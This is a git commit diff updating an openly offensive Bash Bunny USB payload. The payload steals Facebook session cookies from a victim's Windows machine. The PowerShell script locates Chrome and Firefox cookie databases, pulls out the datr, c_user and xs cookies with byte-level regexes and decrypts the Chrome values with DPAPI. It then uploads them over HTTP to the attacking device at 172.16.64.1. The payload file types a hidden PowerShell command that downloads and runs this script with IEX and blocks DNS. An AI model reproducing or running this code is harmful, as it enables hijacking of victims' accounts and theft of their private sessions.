Updated WindowsCookie for firmware v1.1 and fix powershell regex for Windows 7 (#161)
Ben
Sebastian Kinne
parent
ce0c7d2dbd
commit
32468087e1
|
|
@ -1,13 +1,13 @@
|
|||
# WindowsCookies for Bash Bunnys
|
||||
|
||||
Author: oXis
|
||||
Version: Version 2.0
|
||||
Version: Version 2.1
|
||||
Credit: illwill, sekirkity, EmpireProject
|
||||
|
||||
## Description
|
||||
|
||||
Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession
|
||||
Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines.
|
||||
Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines, now works on Windows 7 (fixed powershell regex)
|
||||
Only payload.txt, server.py and p are required.
|
||||
Server.py will load a local HTTP server, the script is downloaded from that server and then uploads the cookies to it.
|
||||
|
||||
|
|
@ -16,6 +16,6 @@ Server.py will load a local HTTP server, the script is downloaded from that serv
|
|||
| LED | Status |
|
||||
| ---------------- | -------------------------------------- |
|
||||
| Blue (blinking) | Payload init |
|
||||
| White (blinking) | Setup RNDIS_ETHERNET |
|
||||
| Yellow (blinking)| Setup RNDIS_ETHERNET |
|
||||
| Green (blinking) | Done |
|
||||
|
||||
|
|
|
|||
|
|
@ -1,118 +1,124 @@
|
|||
# Instructions: import the module, then perform the commanded needed.
|
||||
|
||||
# Chrome Facebook cookies extraction
|
||||
# Use: Get-FacebookCreds [path to Login Data]
|
||||
# Path is optional, use if automatic search doesn't work
|
||||
|
||||
function Get-FacebookCreds-Firefox() {
|
||||
Param(
|
||||
[String]$Path
|
||||
)
|
||||
|
||||
if ([String]::IsNullOrEmpty($Path)) {
|
||||
# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
|
||||
$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
|
||||
}
|
||||
|
||||
if (![system.io.file]::Exists($Path))
|
||||
{
|
||||
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
|
||||
Break
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Security
|
||||
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
|
||||
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
|
||||
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
|
||||
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
|
||||
$BinaryText = $StreamReader.ReadToEnd()
|
||||
$StreamReader.Close()
|
||||
$Stream.Close()
|
||||
|
||||
# First the magic bytes for the facebook string, datr size is 24
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$datr = $PwdMatches.groups[1]
|
||||
|
||||
# First the magic bytes for the facebook string, c_user size is 15
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$c_user = $PwdMatches.groups[1]
|
||||
|
||||
# First the magic bytes for the facebook string, xs size is 44
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$xs = $PwdMatches.groups[1]
|
||||
|
||||
"$env:computername ---> "
|
||||
"datr is $datr ###"
|
||||
"c_user is $c_user ###"
|
||||
"xs is $xs ###"
|
||||
}
|
||||
|
||||
function Get-FacebookCreds-Chrome() {
|
||||
Param(
|
||||
[String]$Path
|
||||
)
|
||||
|
||||
if ([String]::IsNullOrEmpty($Path)) {
|
||||
$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
|
||||
}
|
||||
|
||||
if (![system.io.file]::Exists($Path))
|
||||
{
|
||||
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
|
||||
Break
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Security
|
||||
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
|
||||
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
|
||||
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
|
||||
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
|
||||
$BinaryText = $StreamReader.ReadToEnd()
|
||||
$StreamReader.Close()
|
||||
$Stream.Close()
|
||||
|
||||
# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
|
||||
# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
|
||||
# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
"$env:computername ---> "
|
||||
"datr is $datr ###"
|
||||
"c_user is $c_user ###"
|
||||
"xs is $xs ###"
|
||||
}
|
||||
|
||||
|
||||
function Payload() {
|
||||
|
||||
Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))
|
||||
Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox))
|
||||
|
||||
}
|
||||
# Instructions: import the module, then perform the commanded needed.
|
||||
|
||||
# Chrome Facebook cookies extraction
|
||||
# Use: Get-FacebookCreds [path to Login Data]
|
||||
# Path is optional, use if automatic search doesn't work
|
||||
|
||||
function Get-FacebookCreds-Firefox() {
|
||||
Param(
|
||||
[String]$Path
|
||||
)
|
||||
|
||||
if ([String]::IsNullOrEmpty($Path)) {
|
||||
# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
|
||||
$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
|
||||
}
|
||||
|
||||
if (![system.io.file]::Exists($Path))
|
||||
{
|
||||
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
|
||||
Break
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Security
|
||||
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
|
||||
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
|
||||
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
|
||||
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
|
||||
$BinaryText = $StreamReader.ReadToEnd()
|
||||
$StreamReader.Close()
|
||||
$Stream.Close()
|
||||
|
||||
# First the magic bytes for the facebook string, datr size is 24
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
|
||||
# $datr = $PwdMatches.groups[1]
|
||||
|
||||
# First the magic bytes for the facebook string, c_user size is 15
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
|
||||
# $c_user = $PwdMatches.groups[1]
|
||||
|
||||
# First the magic bytes for the facebook string, xs size is 44
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
|
||||
# $xs = $PwdMatches.groups[1]
|
||||
|
||||
"Firefox ---> "
|
||||
"datr is $datr ###"
|
||||
"c_user is $c_user ###"
|
||||
"xs is $xs ###"
|
||||
}
|
||||
|
||||
function Get-FacebookCreds-Chrome() {
|
||||
Param(
|
||||
[String]$Path
|
||||
)
|
||||
|
||||
if ([String]::IsNullOrEmpty($Path)) {
|
||||
$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
|
||||
}
|
||||
|
||||
if (![system.io.file]::Exists($Path))
|
||||
{
|
||||
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
|
||||
Break
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Security
|
||||
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
|
||||
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
|
||||
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
|
||||
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
|
||||
$BinaryText = $StreamReader.ReadToEnd()
|
||||
$StreamReader.Close()
|
||||
$Stream.Close()
|
||||
|
||||
# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
|
||||
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
|
||||
# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
|
||||
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
|
||||
# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
|
||||
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
"Chrome ---> "
|
||||
"datr is $datr ###"
|
||||
"c_user is $c_user ###"
|
||||
"xs is $xs ###"
|
||||
}
|
||||
|
||||
|
||||
function Payload() {
|
||||
|
||||
Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
|
||||
Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
|
||||
|
||||
}
|
||||
|
|
@ -1,118 +1,124 @@
|
|||
# Instructions: import the module, then perform the commanded needed.
|
||||
|
||||
# Chrome Facebook cookies extraction
|
||||
# Use: Get-FacebookCreds [path to Login Data]
|
||||
# Path is optional, use if automatic search doesn't work
|
||||
|
||||
function Get-FacebookCreds-Firefox() {
|
||||
Param(
|
||||
[String]$Path
|
||||
)
|
||||
|
||||
if ([String]::IsNullOrEmpty($Path)) {
|
||||
# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
|
||||
$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
|
||||
}
|
||||
|
||||
if (![system.io.file]::Exists($Path))
|
||||
{
|
||||
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
|
||||
Break
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Security
|
||||
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
|
||||
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
|
||||
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
|
||||
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
|
||||
$BinaryText = $StreamReader.ReadToEnd()
|
||||
$StreamReader.Close()
|
||||
$Stream.Close()
|
||||
|
||||
# First the magic bytes for the facebook string, datr size is 24
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$datr = $PwdMatches.groups[1]
|
||||
|
||||
# First the magic bytes for the facebook string, c_user size is 15
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$c_user = $PwdMatches.groups[1]
|
||||
|
||||
# First the magic bytes for the facebook string, xs size is 44
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$xs = $PwdMatches.groups[1]
|
||||
|
||||
"$env:computername ---> "
|
||||
"datr is $datr ###"
|
||||
"c_user is $c_user ###"
|
||||
"xs is $xs ###"
|
||||
}
|
||||
|
||||
function Get-FacebookCreds-Chrome() {
|
||||
Param(
|
||||
[String]$Path
|
||||
)
|
||||
|
||||
if ([String]::IsNullOrEmpty($Path)) {
|
||||
$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
|
||||
}
|
||||
|
||||
if (![system.io.file]::Exists($Path))
|
||||
{
|
||||
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
|
||||
Break
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Security
|
||||
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
|
||||
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
|
||||
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
|
||||
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
|
||||
$BinaryText = $StreamReader.ReadToEnd()
|
||||
$StreamReader.Close()
|
||||
$Stream.Close()
|
||||
|
||||
# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
|
||||
# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
|
||||
# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
"$env:computername ---> "
|
||||
"datr is $datr ###"
|
||||
"c_user is $c_user ###"
|
||||
"xs is $xs ###"
|
||||
}
|
||||
|
||||
|
||||
function Payload() {
|
||||
|
||||
Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))
|
||||
Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox))
|
||||
|
||||
}
|
||||
# Instructions: import the module, then perform the commanded needed.
|
||||
|
||||
# Chrome Facebook cookies extraction
|
||||
# Use: Get-FacebookCreds [path to Login Data]
|
||||
# Path is optional, use if automatic search doesn't work
|
||||
|
||||
function Get-FacebookCreds-Firefox() {
|
||||
Param(
|
||||
[String]$Path
|
||||
)
|
||||
|
||||
if ([String]::IsNullOrEmpty($Path)) {
|
||||
# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
|
||||
$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
|
||||
}
|
||||
|
||||
if (![system.io.file]::Exists($Path))
|
||||
{
|
||||
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
|
||||
Break
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Security
|
||||
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
|
||||
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
|
||||
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
|
||||
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
|
||||
$BinaryText = $StreamReader.ReadToEnd()
|
||||
$StreamReader.Close()
|
||||
$Stream.Close()
|
||||
|
||||
# First the magic bytes for the facebook string, datr size is 24
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
|
||||
# $datr = $PwdMatches.groups[1]
|
||||
|
||||
# First the magic bytes for the facebook string, c_user size is 15
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
|
||||
# $c_user = $PwdMatches.groups[1]
|
||||
|
||||
# First the magic bytes for the facebook string, xs size is 44
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
|
||||
# $xs = $PwdMatches.groups[1]
|
||||
|
||||
"Firefox ---> "
|
||||
"datr is $datr ###"
|
||||
"c_user is $c_user ###"
|
||||
"xs is $xs ###"
|
||||
}
|
||||
|
||||
function Get-FacebookCreds-Chrome() {
|
||||
Param(
|
||||
[String]$Path
|
||||
)
|
||||
|
||||
if ([String]::IsNullOrEmpty($Path)) {
|
||||
$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
|
||||
}
|
||||
|
||||
if (![system.io.file]::Exists($Path))
|
||||
{
|
||||
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
|
||||
Break
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Security
|
||||
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
|
||||
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
|
||||
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
|
||||
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
|
||||
$BinaryText = $StreamReader.ReadToEnd()
|
||||
$StreamReader.Close()
|
||||
$Stream.Close()
|
||||
|
||||
# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
|
||||
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
|
||||
# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
|
||||
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
|
||||
# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
|
||||
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
"Chrome ---> "
|
||||
"datr is $datr ###"
|
||||
"c_user is $c_user ###"
|
||||
"xs is $xs ###"
|
||||
}
|
||||
|
||||
|
||||
function Payload() {
|
||||
|
||||
Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
|
||||
Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
|
||||
|
||||
}
|
||||
|
|
@ -2,34 +2,31 @@
|
|||
#
|
||||
# Title: Facebook session cookies dump
|
||||
# Author: oXis (inspired by illwill)
|
||||
# Version: 2.0
|
||||
# Version: 2.1
|
||||
#
|
||||
# Dumps the stored session cookies from Chrome browser by downloading a Powershell script
|
||||
# then stashes them in /root/udisk/loot/FacebookSession/l
|
||||
# Credits to these guys for their powershell scripts:
|
||||
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
|
||||
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
|
||||
# Also credit to illwill for the BrowerCreds payload
|
||||
# Dumps the stored session cookies from Chrome/Firefox browser by downloading a Powershell script
|
||||
# then stashes them in /root/udisk/loot/FacebookSession/COMPUTER_NAME
|
||||
# Credit to illwill for the BrowerCreds payload
|
||||
#
|
||||
# LED States
|
||||
# Setup.............Setup
|
||||
# Blue..............Running Script
|
||||
# White.............Setup RNDIS_ETHERNET
|
||||
# Yellow............Setup RNDIS_ETHERNET
|
||||
# Green.............Got Browser Creds
|
||||
|
||||
|
||||
LED SETUP
|
||||
LOOTDIR=/root/udisk/loot/FacebookSession
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
ATTACKMODE HID
|
||||
LED STAGE1
|
||||
GET SWITCH_POSITION
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
# server.py can now instant bind sockets
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||
./server.py &
|
||||
sleep 1
|
||||
|
||||
#Dump Chrome Cookies
|
||||
RUN WIN "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\""
|
||||
RUN WIN "powershell -WindowStyle Hidden while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}"
|
||||
|
||||
LED STAGE2
|
